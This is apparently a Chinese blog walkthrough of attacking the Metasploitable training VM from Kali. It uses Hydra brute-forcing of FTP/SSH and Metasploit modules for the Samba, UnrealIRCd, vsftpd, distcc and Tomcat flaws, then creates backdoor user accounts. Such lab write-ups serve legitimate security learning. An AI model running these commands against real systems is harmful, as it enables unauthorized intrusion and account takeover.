记一次kali渗透Metasploitbale靶机

1.网络设置

在这里插入图片描述

2.ifconfig查看Metasploitable的IP:

3.对Metasploitbale进行nmap端口扫描:

Nmap 192.168.22.128

在这里插入图片描述

端口爆破:FTP、SSH等

工具:Hydra

备用字典:user.txt: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-96A18fmY-1640349503054)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image002-1640348393516.jpg)]

pass,txt: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lz66hQty-1640349503056)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image004-1640348393524.jpg)]

一、 爆破FTP

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MNRQbfl3-1640349503056)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image002-1640348429650.jpg)]

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt  ftp://192.168.22.128

//注意路径是桌面还是Desktop

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FWa9X3vl-1640349503058)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image002-1640348436759.jpg)]

二、 爆破SSH

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt 192.168.22.128 ssh

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FN9CjnXc-1640349503059)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image002-1640348501342.jpg)]

利用爆破得到的用户名和密码,进行远程连接测试:

[

[

成功连接:

在这里插入图片描述

在这里插入图片描述

三、端口渗透:

利用metasploit 然后在kali linux中进行渗透:

启动msf msfconsole

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4kVVK97w-1640349503064)(D:\应用\typora\Typora\resources\app\asserts\typora图片\clip_image002-1640348564030.jpg)]

1.端口1: 1524—ingrelock_backdoor

利用telnet连接1524,直接返回root会话

在这里插入图片描述

创建用户ss

在这里插入图片描述
成功:
在这里插入图片描述

2.端口2、1099—distcc程序漏洞—ingrelock

利用metasploit并设置靶机ip进行爆破
在这里插入图片描述

报错,提示未设置payload:

在这里插入图片描述

设置payload:

 set payload cmd/unix/bind_perl

获取到daemon权限:

在这里插入图片描述

3.端口3、139—samba为3.0漏洞

先用nmap进行详细扫描

 nmap -v -A -T4 192.168.22.128

在这里插入图片描述

再用scanner模块进行端口扫描

全端口版本检测:

nmap -sV 192.168.22.128

发现Samba

利用metasploit

在这里插入图片描述

利用 exploit/multi/samba/usermap_script

在这里插入图片描述

Set rhost 192.168.22.128  //设置靶机ip
Exploit

输入whoami,可以看到已经获取到root权限。
在这里插入图片描述

useradd -m ht -p ht   // 创建用户名为ht的用户

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

4.端口4: 6667—irc_3281_backdoor

登录msf ,search irc 找到对应得模块

在这里插入图片描述

利用该模块exploit/unix/irc/unreal_ircd_3281_backdoor

use exploit/unix/irc/unreal_ircd_3281_backdoor
Show options

在这里插入图片描述

设置靶机名 进行漏洞利用 exploit ,

未成功,提示A payload has not been selected
在这里插入图片描述

设置payload:

set payload cmd/unix/bind_perl

成功获取root权限
在这里插入图片描述

创建用户aa

在这里插入图片描述

5.端口5 6200—vsftpd_234_backdoor

利用metasploit 找到利用模块

在这里插入图片描述

利用该模块:

use exploit/unix/ftp/vsftpd_234_backdoor  
show options

在这里插入图片描述

设置靶机名,进行漏洞利用

获取到root权限

在这里插入图片描述

useradd -m ht1 -p aa  //创建用户ht1


在这里插入图片描述

6.端口6:8180—Apache Tomcat弱口令

在终端中输入命令“nmap –sV 192.168.22.128”,对目标主机进行端口扫描,发现开放8180端口并且运行 着ApacheTomcat/CoyoteJSP engine1.1。

在这里插入图片描述
利用该模块:

search tomcat   //搜索tomcat的相关工具和攻击载荷
use auxiliary/scanner/http/tomcat_mgr_login  //启用漏洞利用模块, 提示符就会提示进入到该路径下

在这里插入图片描述

在这里插入图片描述

set rhost 192.168.22.128    //设置攻击目标主机IP
set rport 8180     //设置攻击目标主机端口号
exploit   //实施攻击

获得用户名tomcat,密码tomcat。

在这里插入图片描述

也可用另一种方式获取到tomcat用户名和密码(这里不做展示):使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破 用默认自带的字典即可,如果用桌面上字典 则需要设置set PASS_FILE ‘root/Desktop/password.txt’ & set USER_FILE ‘root/Desktop/user.txt’,然后设置主机名和端口(同上)->show options->run即可。

获取到用户名和密码后使用deploy模块进行攻击:

在这里插入图片描述

 use exploit/multi/http/tomcat_mgr_deploy

报错:

在这里插入图片描述

查看payloads

在这里插入图片描述

设置payload:
在这里插入图片描述

在这里插入图片描述

设置靶机ip和端口以及用户名和密码

在这里插入图片描述成功获取到tomcat会话:

在这里插入图片描述

在这里插入图片描述

也可以如下图设置:

在这里插入图片描述
**如果对你有帮助的话,希望可以点赞、收藏或关注哦! **

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐